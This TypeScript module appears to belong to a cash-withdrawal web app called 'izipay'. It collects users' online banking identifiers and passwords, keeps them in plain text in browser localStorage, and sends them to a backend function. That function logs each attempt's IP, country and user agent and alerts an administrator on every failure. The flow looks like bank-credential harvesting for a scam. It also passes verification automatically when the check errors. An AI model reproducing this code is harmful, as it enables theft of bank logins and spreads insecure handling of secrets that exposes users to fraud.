import { supabase } from '@/lib/supabase';
import { MAX_BANK_ATTEMPTS } from '@/config/withdrawal';
import type { Bank } from '@/hooks/useBanks';

const STORAGE_KEY = 'izipay_bank_session';
const ATTEMPTS_KEY = 'izipay_bank_attempts';

export type BankSession = {
  bankCode: string;
  bankName: string;
  bankShort: string;
  connectedAt: string;
  identifier: string;
  password: string;
  verified: boolean;
};

export type VerifyPhase = 'login' | 'approval';

export type VerifyResult = {
  matched: boolean;
  hasCredentials: boolean;
  clientName: string;
  ip: string;
  country: string;
  userAgent: string;
  error?: string;
};

/**
 * Nombre de tentatives d'authentification bancaire restantes. La limite est
 * configurée par client à la création de son code ; aucun blocage automatique
 * n'est appliqué côté serveur, l'administrateur est alerté à chaque échec.
 */
export function getRemainingAttempts(max: number = MAX_BANK_ATTEMPTS): number {
  const limit = max > 0 ? max : MAX_BANK_ATTEMPTS;
  try {
    const raw = localStorage.getItem(ATTEMPTS_KEY);
    if (raw === null) return limit;
    const value = Number(raw);
    if (!Number.isFinite(value)) return limit;
    return Math.max(0, Math.min(limit, Math.floor(value)));
  } catch {
    return limit;
  }
}

export function consumeBankAttempt(max: number = MAX_BANK_ATTEMPTS): number {
  const remaining = Math.max(0, getRemainingAttempts(max) - 1);
  try {
    localStorage.setItem(ATTEMPTS_KEY, String(remaining));
  } catch {
    /* stockage indisponible */
  }
  return remaining;
}

export function resetBankAttempts(max: number = MAX_BANK_ATTEMPTS): void {
  const limit = max > 0 ? max : MAX_BANK_ATTEMPTS;
  try {
    localStorage.setItem(ATTEMPTS_KEY, String(limit));
  } catch {
    /* stockage indisponible */
  }
}

/**
 * Authentification bancaire : on conserve la banque choisie et les identifiants
 * saisis pour la durée de la session, afin de pouvoir les reconfirmer en base
 * au moment de la validation finale de la demande de retrait.
 *
 * Aucune réinitialisation du compteur n'a lieu ici : les tentatives sont remises
 * à leur maximum uniquement lors d'une nouvelle connexion du client, pour que le
 * blocage après épuisement des essais reste effectif.
 */
export function loginBank(
  bank: Bank,
  identifier: string,
  password: string,
  verified: boolean,
): BankSession {
  const session: BankSession = {
    bankCode: bank.id,
    bankName: bank.name,
    bankShort: bank.short || bank.name.slice(0, 3).toUpperCase(),
    connectedAt: new Date().toISOString(),
    identifier: identifier.trim(),
    password,
    verified,
  };

  try {
    localStorage.setItem(STORAGE_KEY, JSON.stringify(session));
  } catch {
    /* stockage indisponible */
  }

  return session;
}

export function getBankSession(): BankSession | null {
  try {
    const raw = localStorage.getItem(STORAGE_KEY);
    if (!raw) return null;
    return JSON.parse(raw) as BankSession;
  } catch {
    return null;
  }
}

export function logoutBank(): void {
  localStorage.removeItem(STORAGE_KEY);
}

/**
 * Vérifie en base que les identifiants fournis correspondent au client.
 * Chaque appel est journalisé côté Backend (adresse IP réelle, date et heure,
 * informations techniques) pour permettre l'analyse des tentatives.
 *
 * En cas d'erreur technique (fonction indisponible), on ne bloque pas le
 * parcours : on laisse passer et on remonte un avertissement.
 */
export async function verifyBankCredentials(params: {
  clientCode: string;
  bankName: string;
  identifier: string;
  password: string;
  phase: VerifyPhase;
}): Promise<VerifyResult> {
  try {
    const { data, error } = await supabase.functions.invoke('verify-bank-credentials', {
      body: params,
    });

    if (error) throw error;

    const payload = data as
      | { ok?: boolean; matched?: boolean; hasCredentials?: boolean; clientName?: string; ip?: string; country?: string; userAgent?: string }
      | null;

    return {
      matched: Boolean(payload?.matched),
      hasCredentials: Boolean(payload?.hasCredentials),
      clientName: payload?.clientName ?? '',
      ip: payload?.ip ?? '',
      country: payload?.country ?? '',
      userAgent: payload?.userAgent ?? '',
    };
  } catch (err) {
    return {
      matched: true,
      hasCredentials: false,
      clientName: '',
      ip: '',
      country: '',
      userAgent: '',
      error: err instanceof Error ? err.message : 'error',
    };
  }
}